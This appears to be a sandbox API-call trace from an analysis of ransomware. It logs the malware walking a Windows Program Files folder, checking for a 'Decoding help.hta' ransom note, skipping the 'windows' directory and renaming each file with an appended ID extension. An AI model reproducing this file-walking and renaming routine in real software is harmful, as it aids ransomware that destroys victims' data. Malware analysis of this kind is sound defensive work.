lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp" [0052.443] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0052.443] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_glass_thumbnail.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_glass_thumbnail.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.443] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ede1450, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ede1450, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c7063e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xf26, dwReserved0=0x0, dwReserved1=0x0, cFileName="Circle_SelectionSubpictureA.png", cAlternateFileName="")) returned 1 [0052.443] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0052.443] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0052.443] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0052.443] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0052.443] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Circle_SelectionSubpictureA.png") returned 1 [0052.443] lstrlenW (lpString="Circle_SelectionSubpictureA.png") returned 31 [0052.443] lstrcmpiW (lpString1="[ID]", lpString2=".png") returned 1 [0052.443] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0052.443] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0052.443] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Circle_SelectionSubpictureA.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png" [0052.443] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png" [0052.443] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png.[ID]g9uZrLhJaygpwRm1[ID]" [0052.443] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_selectionsubpicturea.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_selectionsubpicturea.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.443] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ede1450, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ede1450, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c7063e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Circle_SelectionSubpictureB.png", cAlternateFileName="")) returned 1 [0052.443] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0052.443] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0052.443] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0052.444] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0052.444] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Circle_SelectionSubpictureB.png") returned 1 [0052.444] lstrlenW (lpString="Circle_SelectionSubpictureB.png") returned 31 [0052.444] lstrcmpiW (lpString1="[ID]", lpString2=".png") returned 1 [0052.444] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0052.444] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0052.444] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Circle_SelectionSubpictureB.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png" [0052.444] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png" [0052.444] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png.[ID]g9uZrLhJaygpwRm1[ID]" [0052.444] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_selectionsubpictureb.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_selectionsubpictureb.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.064] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ee2d70a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ee2d70a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c9679c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Circle_VideoInset.png", cAlternateFileName="")) returned 1 [0053.064] lstrcpyW (in: lpString1=0x11741c80, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.064] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.064] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0053.064] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0053.064] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Circle_VideoInset.png") returned 1 [0053.064] lstrlenW (lpString="Circle_VideoInset.png") returned 21 [0053.064] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.064] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.064] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Circle_VideoInset.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png" [0053.064] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png" [0053.064] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png.[ID]g9uZrLhJaygpwRm1[ID]" [0053.065] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_videoinset.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_videoinset.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.065] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ea030de, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ea030de, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c9fff39, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cloud_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0053.065] lstrcpyW (in: lpString1=0x11741c80, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.065] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.065] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0053.065] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0053.065] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cloud_Thumbnail.bmp") returned 1 [0053.065] lstrlenW (lpString="cloud_Thumbnail.bmp") returned 19 [0053.065] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.065] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.065] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="cloud_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp" [0053.065] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp" [0053.065] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.065] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\cloud_thumbnail.bmp"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\cloud_thumbnail.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.065] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ee2d70a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ee2d70a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c9fff39, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5c9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dot.png", cAlternateFileName="")) returned 1 [0053.065] lstrcpyW (in: lpString1=0x11741c80, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.066] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.066] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0053.066] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0053.066] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Dot.png") returned -1 [0053.066] lstrlenW (lpString="Dot.png") returned 7 [0053.066] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.066] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.066] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Dot.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png" [0053.066] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png" [0053.066] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png.[ID]g9uZrLhJaygpwRm1[ID]" [0053.066] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\dot.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\dot.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.066] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ee799c4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ee799c4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4cb30a29, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x422c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DvdTransform.fx", cAlternateFileName="")) returned 1 [0053.066] lstrcpyW (in: lpString1=0x11741c80, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.066] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.066] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0053.066] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0053.066] lstrcmpiW (lpString1="Decoding help.hta", lpString2="DvdTransform.fx") returned -1 [0053.066] lstrlenW (lpString="DvdTransform.fx") returned 15 [0053.066] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.066] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.067] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="DvdTransform.fx" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx" [0053.067] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx" [0053.067] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx.[ID]g9uZrLhJaygpwRm1[ID]" [0053.067] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\dvdtransform.fx"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\DvdTransform.fx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\dvdtransform.fx.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.067] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f43efc8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7fa6b2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f465237, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FlipPage", cAlternateFileName="")) returned 1 [0053.067] lstrcmpW (lpString1=".", lpString2="FlipPage") returned -1 [0053.067] lstrcmpW (lpString1="..", lpString2="FlipPage") returned -1 [0053.067] lstrcmpiW (lpString1="windows", lpString2="FlipPage") returned 1 [0053.067] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0053.067] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0053.067] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="FlipPage" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage" [0053.067] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\*.*" [0053.067] GlobalMemoryStatus (in: lpBuffer=0x19b1fd10 | out: lpBuffer=0x19b1fd10) [0053.067] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11741c80, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x32c [0053.174] CloseHandle (hObject=0x32c) returned 1 [0053.174] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1a3fc59, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa63097e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1a65ec8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Full", cAlternateFileName="")) returned 1 [0053.174] lstrcmpW (lpString1=".", lpString2="Full") returned -1 [0053.174] lstrcmpW (lpString1="..", lpString2="Full") returned -1 [0053.174] lstrcmpiW (lpString1="windows", lpString2="Full") returned 1 [0053.174] 